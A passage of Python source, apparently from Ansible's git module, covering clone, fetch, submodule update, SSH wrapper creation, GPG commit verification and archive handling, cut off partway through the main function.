            f = open(headfile, 'r')
            rawdata = f.readline()
            f.close()
        except Exception:
            if fail_on_error and module:
                module.fail_json(msg="Unable to read %s" % headfile)
        if rawdata:
            try:
                rawdata = rawdata.replace('refs/remotes/%s' % remote, '', 1)
                refparts = rawdata.split(' ')
                newref = refparts[-1]
                nrefparts = newref.split('/', 2)
                res = nrefparts[-1].rstrip('\n')
            except Exception:
                if fail_on_error and module:
                    module.fail_json(msg="Unable to split head from '%s'" % rawdata)
    return res


def unfrackgitpath(path):
    if path is None:
        return None

    # copied from ansible.utils.path
    return os.path.normpath(os.path.realpath(os.path.expanduser(os.path.expandvars(path))))


def get_submodule_update_params(module, git_path, cwd):
    # or: git submodule [--quiet] update [--init] [-N|--no-fetch]
    # [-f|--force] [--rebase] [--reference <repository>] [--merge]
    # [--recursive] [--] [<path>...]

    params = []

    # run a bad submodule command to get valid params
    cmd = "%s submodule update --help" % (git_path)
    rc, stdout, stderr = module.run_command(cmd, cwd=cwd)
    lines = stderr.split('\n')
    update_line = None
    for line in lines:
        if 'git submodule [--quiet] update ' in line:
            update_line = line
    if update_line:
        update_line = update_line.replace('[', '')
        update_line = update_line.replace(']', '')
        update_line = update_line.replace('|', ' ')
        parts = shlex.split(update_line)
        for part in parts:
            if part.startswith('--'):
                part = part.replace('--', '')
                params.append(part)

    return params


def write_ssh_wrapper(module_tmpdir):
    try:
        # make sure we have full permission to the module_dir, which
        # may not be the case if we're sudo'ing to a non-root user
        if os.access(module_tmpdir, os.W_OK | os.R_OK | os.X_OK):
            fd, wrapper_path = tempfile.mkstemp(prefix=module_tmpdir + '/')
        else:
            raise OSError
    except (IOError, OSError):
        fd, wrapper_path = tempfile.mkstemp()
    fh = os.fdopen(fd, 'w+b')
    template = b("""#!/bin/sh
if [ -z "$GIT_SSH_OPTS" ]; then
    BASEOPTS=""
else
    BASEOPTS=$GIT_SSH_OPTS
fi

# Let ssh fail rather than prompt
BASEOPTS="$BASEOPTS -o BatchMode=yes"

if [ -z "$GIT_KEY" ]; then
    ssh $BASEOPTS "$@"
else
    ssh -i "$GIT_KEY" -o IdentitiesOnly=yes $BASEOPTS "$@"
fi
""")
    fh.write(template)
    fh.close()
    st = os.stat(wrapper_path)
    os.chmod(wrapper_path, st.st_mode | stat.S_IEXEC)
    return wrapper_path


def set_git_ssh(ssh_wrapper, key_file, ssh_opts):

    if os.environ.get("GIT_SSH"):
        del os.environ["GIT_SSH"]
    os.environ["GIT_SSH"] = ssh_wrapper

    if os.environ.get("GIT_KEY"):
        del os.environ["GIT_KEY"]

    if key_file:
        os.environ["GIT_KEY"] = key_file

    if os.environ.get("GIT_SSH_OPTS"):
        del os.environ["GIT_SSH_OPTS"]

    if ssh_opts:
        os.environ["GIT_SSH_OPTS"] = ssh_opts


def get_version(module, git_path, dest, ref="HEAD"):
    ''' samples the version of the git repo '''

    cmd = "%s rev-parse %s" % (git_path, ref)
    rc, stdout, stderr = module.run_command(cmd, cwd=dest)
    sha = to_native(stdout).rstrip('\n')
    return sha


def ssh_supports_acceptnewhostkey(module):
    try:
        ssh_path = get_bin_path('ssh')
    except ValueError as err:
        module.fail_json(
            msg='Remote host is missing ssh command, so you cannot '
            'use acceptnewhostkey option.', details=to_text(err))
    supports_acceptnewhostkey = True
    cmd = [ssh_path, '-o', 'StrictHostKeyChecking=accept-new', '-V']
    rc, stdout, stderr = module.run_command(cmd)
    if rc != 0:
        supports_acceptnewhostkey = False
    return supports_acceptnewhostkey


def get_submodule_versions(git_path, module, dest, version='HEAD'):
    cmd = [git_path, 'submodule', 'foreach', git_path, 'rev-parse', version]
    (rc, out, err) = module.run_command(cmd, cwd=dest)
    if rc != 0:
        module.fail_json(
            msg='Unable to determine hashes of submodules',
            stdout=out,
            stderr=err,
            rc=rc)
    submodules = {}
    subm_name = None
    for line in out.splitlines():
        if line.startswith("Entering '"):
            subm_name = line[10:-1]
        elif len(line.strip()) == 40:
            if subm_name is None:
                module.fail_json()
            submodules[subm_name] = line.strip()
            subm_name = None
        else:
            module.fail_json(msg='Unable to parse submodule hash line: %s' % line.strip())
    if subm_name is not None:
        module.fail_json(msg='Unable to find hash for submodule: %s' % subm_name)

    return submodules


def clone(git_path, module, repo, dest, remote, depth, version, bare,
          reference, refspec, git_version_used, verify_commit, separate_git_dir, result, gpg_whitelist, single_branch):
    ''' makes a new git repo if it does not already exist '''
    dest_dirname = os.path.dirname(dest)
    try:
        os.makedirs(dest_dirname)
    except Exception:
        pass
    cmd = [git_path, 'clone']

    if bare:
        cmd.append('--bare')
    else:
        cmd.extend(['--origin', remote])

    is_branch_or_tag = is_remote_branch(git_path, module, dest, repo, version) or is_remote_tag(git_path, module, dest, repo, version)
    if depth:
        if version == 'HEAD' or refspec:
            cmd.extend(['--depth', str(depth)])
        elif is_branch_or_tag:
            cmd.extend(['--depth', str(depth)])
            cmd.extend(['--branch', version])
        else:
            # only use depth if the remote object is branch or tag (i.e. fetchable)
            module.warn("Ignoring depth argument. "
                        "Shallow clones are only available for "
                        "HEAD, branches, tags or in combination with refspec.")
    if reference:
        cmd.extend(['--reference', str(reference)])

    if single_branch:
        if git_version_used is None:
            module.fail_json(msg='Cannot find git executable at %s' % git_path)

        if git_version_used < LooseVersion('1.7.10'):
            module.warn("git version '%s' is too old to use 'single-branch'. Ignoring." % git_version_used)
        else:
            cmd.append("--single-branch")

            if is_branch_or_tag:
                cmd.extend(['--branch', version])

    needs_separate_git_dir_fallback = False
    if separate_git_dir:
        if git_version_used is None:
            module.fail_json(msg='Cannot find git executable at %s' % git_path)
        if git_version_used < LooseVersion('1.7.5'):
            # git before 1.7.5 doesn't have separate-git-dir argument, do fallback
            needs_separate_git_dir_fallback = True
        else:
            cmd.append('--separate-git-dir=%s' % separate_git_dir)

    cmd.extend([repo, dest])
    module.run_command(cmd, check_rc=True, cwd=dest_dirname)
    if needs_separate_git_dir_fallback:
        relocate_repo(module, result, separate_git_dir, os.path.join(dest, ".git"), dest)

    if bare and remote != 'origin':
        module.run_command([git_path, 'remote', 'add', remote, repo], check_rc=True, cwd=dest)

    if refspec:
        cmd = [git_path, 'fetch']
        if depth:
            cmd.extend(['--depth', str(depth)])
        cmd.extend([remote, refspec])
        module.run_command(cmd, check_rc=True, cwd=dest)

    if verify_commit:
        verify_commit_sign(git_path, module, dest, version, gpg_whitelist)


def has_local_mods(module, git_path, dest, bare):
    if bare:
        return False

    cmd = "%s status --porcelain" % (git_path)
    rc, stdout, stderr = module.run_command(cmd, cwd=dest)
    lines = stdout.splitlines()
    lines = list(filter(lambda c: not re.search('^\\?\\?.*$', c), lines))

    return len(lines) > 0


def reset(git_path, module, dest):
    '''
    Resets the index and working tree to HEAD.
    Discards any changes to tracked files in working
    tree since that commit.
    '''
    cmd = "%s reset --hard HEAD" % (git_path,)
    return module.run_command(cmd, check_rc=True, cwd=dest)


def get_diff(module, git_path, dest, repo, remote, depth, bare, before, after):
    ''' Return the difference between 2 versions '''
    if before is None:
        return {'prepared': '>> Newly checked out %s' % after}
    elif before != after:
        # Ensure we have the object we are referring to during git diff !
        git_version_used = git_version(git_path, module)
        fetch(git_path, module, repo, dest, after, remote, depth, bare, '', git_version_used)
        cmd = '%s diff %s %s' % (git_path, before, after)
        (rc, out, err) = module.run_command(cmd, cwd=dest)
        if rc == 0 and out:
            return {'prepared': out}
        elif rc == 0:
            return {'prepared': '>> No visual differences between %s and %s' % (before, after)}
        elif err:
            return {'prepared': '>> Failed to get proper diff between %s and %s:\n>> %s' % (before, after, err)}
        else:
            return {'prepared': '>> Failed to get proper diff between %s and %s' % (before, after)}
    return {}


def get_remote_head(git_path, module, dest, version, remote, bare):
    cloning = False
    cwd = None
    tag = False
    if remote == module.params['repo']:
        cloning = True
    elif remote == 'file://' + os.path.expanduser(module.params['repo']):
        cloning = True
    else:
        cwd = dest
    if version == 'HEAD':
        if cloning:
            # cloning the repo, just get the remote's HEAD version
            cmd = '%s ls-remote %s -h HEAD' % (git_path, remote)
        else:
            head_branch = get_head_branch(git_path, module, dest, remote, bare)
            cmd = '%s ls-remote %s -h refs/heads/%s' % (git_path, remote, head_branch)
    elif is_remote_branch(git_path, module, dest, remote, version):
        cmd = '%s ls-remote %s -h refs/heads/%s' % (git_path, remote, version)
    elif is_remote_tag(git_path, module, dest, remote, version):
        tag = True
        cmd = '%s ls-remote %s -t refs/tags/%s*' % (git_path, remote, version)
    else:
        # appears to be a sha1.  return as-is since it appears
        # cannot check for a specific sha1 on remote
        return version
    (rc, out, err) = module.run_command(cmd, check_rc=True, cwd=cwd)
    if len(out) < 1:
        module.fail_json(msg="Could not determine remote revision for %s" % version, stdout=out, stderr=err, rc=rc)

    out = to_native(out)

    if tag:
        # Find the dereferenced tag if this is an annotated tag.
        for tag in out.split('\n'):
            if tag.endswith(version + '^{}'):
                out = tag
                break
            elif tag.endswith(version):
                out = tag

    rev = out.split()[0]
    return rev


def is_remote_tag(git_path, module, dest, remote, version):
    cmd = '%s ls-remote %s -t refs/tags/%s' % (git_path, remote, version)
    (rc, out, err) = module.run_command(cmd, check_rc=True, cwd=dest)
    if to_native(version, errors='surrogate_or_strict') in out:
        return True
    else:
        return False


def get_branches(git_path, module, dest):
    branches = []
    cmd = '%s branch --no-color -a' % (git_path,)
    (rc, out, err) = module.run_command(cmd, cwd=dest)
    if rc != 0:
        module.fail_json(msg="Could not determine branch data - received %s" % out, stdout=out, stderr=err)
    for line in out.split('\n'):
        if line.strip():
            branches.append(line.strip())
    return branches


def get_annotated_tags(git_path, module, dest):
    tags = []
    cmd = [git_path, 'for-each-ref', 'refs/tags/', '--format', '%(objecttype):%(refname:short)']
    (rc, out, err) = module.run_command(cmd, cwd=dest)
    if rc != 0:
        module.fail_json(msg="Could not determine tag data - received %s" % out, stdout=out, stderr=err)
    for line in to_native(out).split('\n'):
        if line.strip():
            tagtype, tagname = line.strip().split(':')
            if tagtype == 'tag':
                tags.append(tagname)
    return tags


def is_remote_branch(git_path, module, dest, remote, version):
    cmd = '%s ls-remote %s -h refs/heads/%s' % (git_path, remote, version)
    (rc, out, err) = module.run_command(cmd, check_rc=True, cwd=dest)
    if to_native(version, errors='surrogate_or_strict') in out:
        return True
    else:
        return False


def is_local_branch(git_path, module, dest, branch):
    branches = get_branches(git_path, module, dest)
    lbranch = '%s' % branch
    if lbranch in branches:
        return True
    elif '* %s' % branch in branches:
        return True
    else:
        return False


def is_not_a_branch(git_path, module, dest):
    branches = get_branches(git_path, module, dest)
    for branch in branches:
        if branch.startswith('* ') and ('no branch' in branch or 'detached from' in branch or 'detached at' in branch):
            return True
    return False


def get_repo_path(dest, bare):
    if bare:
        repo_path = dest
    else:
        repo_path = os.path.join(dest, '.git')
    # Check if the .git is a file. If it is a file, it means that the repository is in external directory respective to the working copy (e.g. we are in a
    # submodule structure).
    if os.path.isfile(repo_path):
        with open(repo_path, 'r') as gitfile:
            data = gitfile.read()
        ref_prefix, gitdir = data.rstrip().split('gitdir: ', 1)
        if ref_prefix:
            raise ValueError('.git file has invalid git dir reference format')

        # There is a possibility the .git file to have an absolute path.
        if os.path.isabs(gitdir):
            repo_path = gitdir
        else:
            repo_path = os.path.join(repo_path.split('.git')[0], gitdir)
        if not os.path.isdir(repo_path):
            raise ValueError('%s is not a directory' % repo_path)
    return repo_path


def get_head_branch(git_path, module, dest, remote, bare=False):
    '''
    Determine what branch HEAD is associated with.  This is partly
    taken from lib/ansible/utils/__init__.py.  It finds the correct
    path to .git/HEAD and reads from that file the branch that HEAD is
    associated with.  In the case of a detached HEAD, this will look
    up the branch in .git/refs/remotes/<remote>/HEAD.
    '''
    try:
        repo_path = get_repo_path(dest, bare)
    except (IOError, ValueError) as err:
        # No repo path found
        """``.git`` file does not have a valid format for detached Git dir."""
        module.fail_json(
            msg='Current repo does not have a valid reference to a '
            'separate Git dir or it refers to the invalid path',
            details=to_text(err),
        )
    # Read .git/HEAD for the name of the branch.
    # If we're in a detached HEAD state, look up the branch associated with
    # the remote HEAD in .git/refs/remotes/<remote>/HEAD
    headfile = os.path.join(repo_path, "HEAD")
    if is_not_a_branch(git_path, module, dest):
        headfile = os.path.join(repo_path, 'refs', 'remotes', remote, 'HEAD')
    branch = head_splitter(headfile, remote, module=module, fail_on_error=True)
    return branch


def get_remote_url(git_path, module, dest, remote):
    '''Return URL of remote source for repo.'''
    command = [git_path, 'ls-remote', '--get-url', remote]
    (rc, out, err) = module.run_command(command, cwd=dest)
    if rc != 0:
        # There was an issue getting remote URL, most likely
        # command is not available in this version of Git.
        return None
    return to_native(out).rstrip('\n')


def set_remote_url(git_path, module, repo, dest, remote):
    ''' updates repo from remote sources '''
    # Return if remote URL isn't changing.
    remote_url = get_remote_url(git_path, module, dest, remote)
    if remote_url == repo or unfrackgitpath(remote_url) == unfrackgitpath(repo):
        return False

    command = [git_path, 'remote', 'set-url', remote, repo]
    (rc, out, err) = module.run_command(command, cwd=dest)
    if rc != 0:
        label = "set a new url %s for %s" % (repo, remote)
        module.fail_json(msg="Failed to %s: %s %s" % (label, out, err))

    # Return False if remote_url is None to maintain previous behavior
    # for Git versions prior to 1.7.5 that lack required functionality.
    return remote_url is not None


def fetch(git_path, module, repo, dest, version, remote, depth, bare, refspec, git_version_used, force=False):
    ''' updates repo from remote sources '''
    set_remote_url(git_path, module, repo, dest, remote)
    commands = []

    fetch_str = 'download remote objects and refs'
    fetch_cmd = [git_path, 'fetch']

    refspecs = []
    if depth:
        # try to find the minimal set of refs we need to fetch to get a
        # successful checkout
        currenthead = get_head_branch(git_path, module, dest, remote)
        if refspec:
            refspecs.append(refspec)
        elif version == 'HEAD':
            refspecs.append(currenthead)
        elif is_remote_branch(git_path, module, dest, repo, version):
            if currenthead != version:
                # this workaround is only needed for older git versions
                # 1.8.3 is broken, 1.9.x works
                # ensure that remote branch is available as both local and remote ref
                refspecs.append('+refs/heads/%s:refs/heads/%s' % (version, version))
            refspecs.append('+refs/heads/%s:refs/remotes/%s/%s' % (version, remote, version))
        elif is_remote_tag(git_path, module, dest, repo, version):
            refspecs.append('+refs/tags/' + version + ':refs/tags/' + version)
        if refspecs:
            # if refspecs is empty, i.e. version is neither heads nor tags
            # assume it is a version hash
            # fall back to a full clone, otherwise we might not be able to checkout
            # version
            fetch_cmd.extend(['--depth', str(depth)])

    if not depth or not refspecs:
        # don't try to be minimalistic but do a full clone
        # also do this if depth is given, but version is something that can't be fetched directly
        if bare:
            refspecs = ['+refs/heads/*:refs/heads/*', '+refs/tags/*:refs/tags/*']
        else:
            # ensure all tags are fetched
            if git_version_used >= LooseVersion('1.9'):
                fetch_cmd.append('--tags')
            else:
                # old git versions have a bug in --tags that prevents updating existing tags
                commands.append((fetch_str, fetch_cmd + [remote]))
                refspecs = ['+refs/tags/*:refs/tags/*']
        if refspec:
            refspecs.append(refspec)

    if force:
        fetch_cmd.append('--force')

    fetch_cmd.extend([remote])

    commands.append((fetch_str, fetch_cmd + refspecs))

    for (label, command) in commands:
        (rc, out, err) = module.run_command(command, cwd=dest)
        if rc != 0:
            module.fail_json(msg="Failed to %s: %s %s" % (label, out, err), cmd=command)


def submodules_fetch(git_path, module, remote, track_submodules, dest):
    changed = False

    if not os.path.exists(os.path.join(dest, '.gitmodules')):
        # no submodules
        return changed

    gitmodules_file = open(os.path.join(dest, '.gitmodules'), 'r')
    for line in gitmodules_file:
        # Check for new submodules
        if not changed and line.strip().startswith('path'):
            path = line.split('=', 1)[1].strip()
            # Check that dest/path/.git exists
            if not os.path.exists(os.path.join(dest, path, '.git')):
                changed = True

    # Check for updates to existing modules
    if not changed:
        # Fetch updates
        begin = get_submodule_versions(git_path, module, dest)
        cmd = [git_path, 'submodule', 'foreach', git_path, 'fetch']
        (rc, out, err) = module.run_command(cmd, check_rc=True, cwd=dest)
        if rc != 0:
            module.fail_json(msg="Failed to fetch submodules: %s" % out + err)

        if track_submodules:
            # Compare against submodule HEAD
            # FIXME: determine this from .gitmodules
            version = 'master'
            after = get_submodule_versions(git_path, module, dest, '%s/%s' % (remote, version))
            if begin != after:
                changed = True
        else:
            # Compare against the superproject's expectation
            cmd = [git_path, 'submodule', 'status']
            (rc, out, err) = module.run_command(cmd, check_rc=True, cwd=dest)
            if rc != 0:
                module.fail_json(msg='Failed to retrieve submodule status: %s' % out + err)
            for line in out.splitlines():
                if line[0] != ' ':
                    changed = True
                    break
    return changed


def submodule_update(git_path, module, dest, track_submodules, force=False):
    ''' init and update any submodules '''

    # get the valid submodule params
    params = get_submodule_update_params(module, git_path, dest)

    # skip submodule commands if .gitmodules is not present
    if not os.path.exists(os.path.join(dest, '.gitmodules')):
        return (0, '', '')
    cmd = [git_path, 'submodule', 'sync']
    (rc, out, err) = module.run_command(cmd, check_rc=True, cwd=dest)
    if 'remote' in params and track_submodules:
        cmd = [git_path, 'submodule', 'update', '--init', '--recursive', '--remote']
    else:
        cmd = [git_path, 'submodule', 'update', '--init', '--recursive']
    if force:
        cmd.append('--force')
    (rc, out, err) = module.run_command(cmd, cwd=dest)
    if rc != 0:
        module.fail_json(msg="Failed to init/update submodules: %s" % out + err)
    return (rc, out, err)


def set_remote_branch(git_path, module, dest, remote, version, depth):
    """set refs for the remote branch version

    This assumes the branch does not yet exist locally and is therefore also not checked out.
    Can't use git remote set-branches, as it is not available in git 1.7.1 (centos6)
    """

    branchref = "+refs/heads/%s:refs/heads/%s" % (version, version)
    branchref += ' +refs/heads/%s:refs/remotes/%s/%s' % (version, remote, version)
    cmd = "%s fetch --depth=%s %s %s" % (git_path, depth, remote, branchref)
    (rc, out, err) = module.run_command(cmd, cwd=dest)
    if rc != 0:
        module.fail_json(msg="Failed to fetch branch from remote: %s" % version, stdout=out, stderr=err, rc=rc)


def switch_version(git_path, module, dest, remote, version, verify_commit, depth, gpg_whitelist):
    cmd = ''
    if version == 'HEAD':
        branch = get_head_branch(git_path, module, dest, remote)
        (rc, out, err) = module.run_command("%s checkout --force %s" % (git_path, branch), cwd=dest)
        if rc != 0:
            module.fail_json(msg="Failed to checkout branch %s" % branch,
                             stdout=out, stderr=err, rc=rc)
        cmd = "%s reset --hard %s/%s --" % (git_path, remote, branch)
    else:
        # FIXME check for local_branch first, should have been fetched already
        if is_remote_branch(git_path, module, dest, remote, version):
            if depth and not is_local_branch(git_path, module, dest, version):
                # git clone --depth implies --single-branch, which makes
                # the checkout fail if the version changes
                # fetch the remote branch, to be able to check it out next
                set_remote_branch(git_path, module, dest, remote, version, depth)
            if not is_local_branch(git_path, module, dest, version):
                cmd = "%s checkout --track -b %s %s/%s" % (git_path, version, remote, version)
            else:
                (rc, out, err) = module.run_command("%s checkout --force %s" % (git_path, version), cwd=dest)
                if rc != 0:
                    module.fail_json(msg="Failed to checkout branch %s" % version, stdout=out, stderr=err, rc=rc)
                cmd = "%s reset --hard %s/%s" % (git_path, remote, version)
        else:
            cmd = "%s checkout --force %s" % (git_path, version)
    (rc, out1, err1) = module.run_command(cmd, cwd=dest)
    if rc != 0:
        if version != 'HEAD':
            module.fail_json(msg="Failed to checkout %s" % (version),
                             stdout=out1, stderr=err1, rc=rc, cmd=cmd)
        else:
            module.fail_json(msg="Failed to checkout branch %s" % (branch),
                             stdout=out1, stderr=err1, rc=rc, cmd=cmd)

    if verify_commit:
        verify_commit_sign(git_path, module, dest, version, gpg_whitelist)

    return (rc, out1, err1)


def verify_commit_sign(git_path, module, dest, version, gpg_whitelist):
    if version in get_annotated_tags(git_path, module, dest):
        git_sub = "verify-tag"
    else:
        git_sub = "verify-commit"
    cmd = "%s %s %s" % (git_path, git_sub, version)
    if gpg_whitelist:
        cmd += " --raw"
    (rc, out, err) = module.run_command(cmd, cwd=dest)
    if rc != 0:
        module.fail_json(msg='Failed to verify GPG signature of commit/tag "%s"' % version, stdout=out, stderr=err, rc=rc)
    if gpg_whitelist:
        fingerprint = get_gpg_fingerprint(err)
        if fingerprint not in gpg_whitelist:
            module.fail_json(msg='The gpg_whitelist does not include the public key "%s" for this commit' % fingerprint, stdout=out, stderr=err, rc=rc)
    return (rc, out, err)


def get_gpg_fingerprint(output):
    """Return a fingerprint of the primary key.

    Ref:
    https://git.gnupg.org/cgi-bin/gitweb.cgi?p=gnupg.git;a=blob;f=doc/DETAILS;hb=HEAD#l482
    """
    for line in output.splitlines():
        data = line.split()
        if data[1] != 'VALIDSIG':
            continue

        # if signed with a subkey, this contains the primary key fingerprint
        data_id = 11 if len(data) == 11 else 2
        return data[data_id]


def git_version(git_path, module):
    """return the installed version of git"""
    cmd = "%s --version" % git_path
    (rc, out, err) = module.run_command(cmd)
    if rc != 0:
        # one could fail_json here, but the version info is not that important,
        # so let's try to fail only on actual git commands
        return None
    rematch = re.search('git version (.*)$', to_native(out))
    if not rematch:
        return None
    return LooseVersion(rematch.groups()[0])


def git_archive(git_path, module, dest, archive, archive_fmt, archive_prefix, version):
    """ Create git archive in given source directory """
    cmd = [git_path, 'archive', '--format', archive_fmt, '--output', archive, version]
    if archive_prefix is not None:
        cmd.insert(-1, '--prefix')
        cmd.insert(-1, archive_prefix)
    (rc, out, err) = module.run_command(cmd, cwd=dest)
    if rc != 0:
        module.fail_json(msg="Failed to perform archive operation",
                         details="Git archive command failed to create "
                                 "archive %s using %s directory."
                                 "Error: %s" % (archive, dest, err))
    return rc, out, err


def create_archive(git_path, module, dest, archive, archive_prefix, version, repo, result):
    """ Helper function for creating archive using git_archive """
    all_archive_fmt = {'.zip': 'zip', '.gz': 'tar.gz', '.tar': 'tar',
                       '.tgz': 'tgz'}
    _, archive_ext = os.path.splitext(archive)
    archive_fmt = all_archive_fmt.get(archive_ext, None)
    if archive_fmt is None:
        module.fail_json(msg="Unable to get file extension from "
                             "archive file name : %s" % archive,
                         details="Please specify archive as filename with "
                                 "extension. File extension can be one "
                                 "of ['tar', 'tar.gz', 'zip', 'tgz']")

    repo_name = repo.split("/")[-1].replace(".git", "")

    if os.path.exists(archive):
        # If git archive file exists, then compare it with new git archive file.
        # if match, do nothing
        # if does not match, then replace existing with temp archive file.
        tempdir = tempfile.mkdtemp()
        new_archive_dest = os.path.join(tempdir, repo_name)
        new_archive = new_archive_dest + '.' + archive_fmt
        git_archive(git_path, module, dest, new_archive, archive_fmt, archive_prefix, version)

        # filecmp is supposed to be efficient than md5sum checksum
        if filecmp.cmp(new_archive, archive):
            result.update(changed=False)
            # Cleanup before exiting
            try:
                shutil.rmtree(tempdir)
            except OSError:
                pass
        else:
            try:
                shutil.move(new_archive, archive)
                shutil.rmtree(tempdir)
                result.update(changed=True)
            except OSError as e:
                module.fail_json(msg="Failed to move %s to %s" %
                                     (new_archive, archive),
                                 details=u"Error occurred while moving : %s"
                                         % to_text(e))
    else:
        # Perform archive from local directory
        git_archive(git_path, module, dest, archive, archive_fmt, archive_prefix, version)
        result.update(changed=True)


# ===========================================

def main():
    module = AnsibleModule(
        argument_spec=dict(
            dest=dict(type='path'),
            repo=dict(required=True, aliases=['name']),
            version=dict(default='HEAD'),
            remote=dict(default='origin'),
            refspec=dict(default=None),
            reference=dict(default=None),
            force=dict(default='no', type='bool'),
            depth=dict(default=None, type='int'),
            clone=dict(default='yes', type='bool'),
            update=dict(default='yes', type='bool'),
            verify_commit=dict(default='no', type='bool'),
            gpg_whitelist=dict(default=[], type='list', elements='str'),
            accept_hostkey=dict(default='no', type='bool'),
            accept_newhostkey=dict(default='no', type='bool'),
            key_file=dict(default=None, type='path', required=False),
            ssh_opts=dict(default=None, required=False),
            executable=dict(default=None, type='path'),
            bare=dict(default='no', type='bool'),
            recursive=dict(default='yes', type='bool'),
            single_branch=dict(default=False, type='bool'),
            track_submodules=dict(default='no', type='bool'),
            umask=dict(default=None, type='raw'),
            archive=dict(type='path'),
            archive_prefix=dict(),
            separate_git_dir=dict(type='path'),
        ),
        mutually_exclusive=[('separate_git_dir', 'bare'), ('accept_hostkey', 'accept_newhostkey')],
        required_by={'archive_prefix': ['archive']},
        supports_check_mode=True
    )

    dest = module.params['dest']
    repo = module.params['repo']
    version = module.params['version']
    remote = module.params['remote']
    refspec = module.params['refspec']
    force = module.params['force']
    depth = module.params['depth']
    update = module.params['update']
    allow_clone = module.params['clone']
    bare = module.params['bare']
    verify_commit = module.params['verify_commit']
    gpg_whitelist = module.params['gpg_whitelist']
    reference = module.params['reference']
    single_branch = module.params['single_branch']
    git_path = module.params['executable'] or module.get_bin_path('git', True)
    key_file = module.params['key_file']
    ssh_opts = module.params['ssh_opts']
    umask = module.params['umask']
    archive = module.params['archive']
    archive_prefix = module.params['archive_prefix']
    separate_git_dir = module.params['separate_git_dir']

    result = dict(changed=False, warnings=list())

    if module.params['accept_hostkey']:
        if ssh_opts is not None:
            if ("-o StrictHostKeyChecking=no" not in ssh_opts) and ("-o StrictHostKeyChecking=accept-new" not in ssh_opts):
                ssh_opts += " -o StrictHostKeyChecking=no"
        else:
            ssh_opts = "-o StrictHostKeyChecking=no"

    if module.params['accept_newhostkey']:
        if not ssh_supports_acceptnewhostkey(module):
            module.warn("Your ssh client does not support accept_newhostkey option, therefore it cannot be used.")
        else:
            if ssh_opts is not None:
                if ("-o StrictHostKeyChecking=no" not in ssh_opts) and ("-o StrictHostKeyChecking=accept-new" not in ssh_opts):
                    ssh_opts += " -o StrictHostKeyChecking=accept-new"
            else:
                ssh_opts = "-o StrictHostKeyChecking=accept-new"

    # evaluate and set the umask before doing anything else
    if umask is not None:
        if not isinstance(umask, string_types):
            module.fail_json(msg="umask must be defined as a quoted octal integer")
        try:
            umask = int(umask, 8)
        except Exception:
            module.fail_json(msg="umask must be an octal integer",
                             details=str(sys.exc_info()[1]))
        os.umask(umask)

    # Certain features such as depth require a file:/// protocol for path based urls
    # so force a protocol here ...
    if os.path.expanduser(repo).startswith('/'):
        repo = 'file://' + os.path.expanduser(repo)

    # We screenscrape a huge amount of git commands so use C locale anytime we
    # call run_command()
    module.run_command_environ_update = dict(LANG='C', LC_ALL='C', LC_MESSAGES='C', LC_CTYPE='C')

    if separate_git_dir:
        separate_git_dir = os.path.realpath(separate_git_dir)

    gitconfig = None
    if not dest and allow_clone:
        module.fail_json(msg="the destination directory must be specified unless clone=no")
    elif dest:
        dest = os.path.abspath(dest)
        try:
            repo_path = get_repo_path(dest, bare)
            if separate_git_dir and os.path.exists(repo_path) and separate_git_dir != repo_path:
                result['changed'] = True
                if not module.check_mode:
                    relocate_repo(module, result, separate_git_dir, repo_path, dest)
                    repo_path = separate_git_dir
        except (IOError, ValueError) as err:
            # No repo path found
            """``.git`` file does not have a valid format for detached Git dir."""
            module.fail_json(
                msg='Current repo does not have a valid reference to a '
                'separate Git dir or it refers to the invalid path',
                details=to_text(err),
            )
        gitconfig = os.path.join(repo_path, 'config')

    # create a wrapper script and export
    # GIT_SSH=<path> as an environment variable
    # for git to use the wrapper script
    ssh_wrapper = write_ssh_wrapper(module.tmpdir)
    set_git_ssh(ssh_wrapper, key_file, ssh_opts)
    module.add_cleanup_file(path=ssh_wrapper)

    git_version_used = git_version(git_path, module)

    if depth is not None and git_version_used < LooseVersion('1.9.1'):
        module.warn("git version is too old to fully support the depth argument. Falling back to full checkouts.")
        depth = None

    recursive = module.params['recursive']
    track_submodules = module.params['track_submodules']

    result.update(before=None)

    local_mods = False
    if (dest and not os.path.exists(gitconfig)) or (not dest and not allow_clone):
        # if there is no git configuration, do a clone operation unless:
        # * the user requested no clone (they just want info)
        # * we're doing a check mode test
        # In those cases we do an ls-remote
        if module.check_mode or not allow_clone:
            remote_head = get_remote_head(git_path, module, dest, version, repo, bare)
            result.update(changed=True, after=remote_head)
            if module._diff:
                diff = get_diff(module, git_path, dest, repo, remote, depth, bare, result['before'], result['after'])
                if diff:
                    result['diff'] = diff
            module.exit_json(**result)
        # there's no git config, so clone
        clone(git_path, module, repo, dest, remote, depth, version, bare, reference,
              refspec, git_version_used, verify_commit, separate_git_dir, result, gpg_whitelist, single_branch)
    elif not update:
        # Just return having found a repo already in the dest path
        # this does no checking that the repo is the actual repo
        # requested.
        result['before'] = get_version(module, git_path, dest)
        result.update(after=result['before'])
        if archive:
            # Git archive is not supported by all git servers, so
            # we will first clone and perform git archive from local directory
            if module.check_mode:
                result.update(changed=True)
                module.exit_json(**result)

            create_archive(git_path, module, dest, archive, archive_prefix, version, repo, result)

        module.exit_json(**result)
    else:
        # else do a pull
        local_mods = has_local_mods(module, git_path, dest, bare)
        result['before'] = get_version(module, git_path, dest)
        if local_mods:
            # failure should happen regardless of check mode
            if not force:
                module.fail_json(msg="Local modifications exist in repository (force=no).", **result)
            # if force and in non-check mode, do a reset
            if not module.check_mode:
                reset(git_path, module, dest)
                result.update(changed=True, msg='Local modifications exist.')

        # exit if already at desired sha version
        if module.check_mode:
            remote_url = get_remote_url(git_path, module, dest, remote)
            remote_url_changed = remote_url and remote_url != repo and unfrackgitpath(remote_url) != unfrackgitpath(repo)
        else:
            remote_url_changed = set_remote_url(git_path, module, repo, dest, remote)
        result.update(remote_url_changed=remote_url_changed)

        if module.check_mode:
            remote_head = get_remote_head(git_path, module, dest, version, remote, bare)
            result.update(changed=(result['before'] != remote_head or remote_url_changed), after=remote_head)
            # FIXME: This diff should fail since the new remote_head is not fetched yet?!
            if module._diff:
                diff = get_diff(module, git_path, dest, repo, remote, depth, bare, result['before'], result['after'])
                if diff:
                    result['diff'] = diff
            module.exit_json(**result)
        else:
            fetch(git_path, module, repo, dest, version, remote, depth, bare, refspec, git_version_used, force=force)

        result['after'] = get_version(module, git_path, dest)

    # switch to version specified regardless of whether
    # we got new revisions from the repository
    if not bare:
        switch_version(git_path, module, dest, remote, version, verify_commit, depth, gpg_whitelist)

    # Deal with submodules
    submodules_updated = False
    if recursive and not bare:
        submodules_updated = submodules_fetch(git_path, module, remote, track_submodules, dest)
        if submodules_updated:
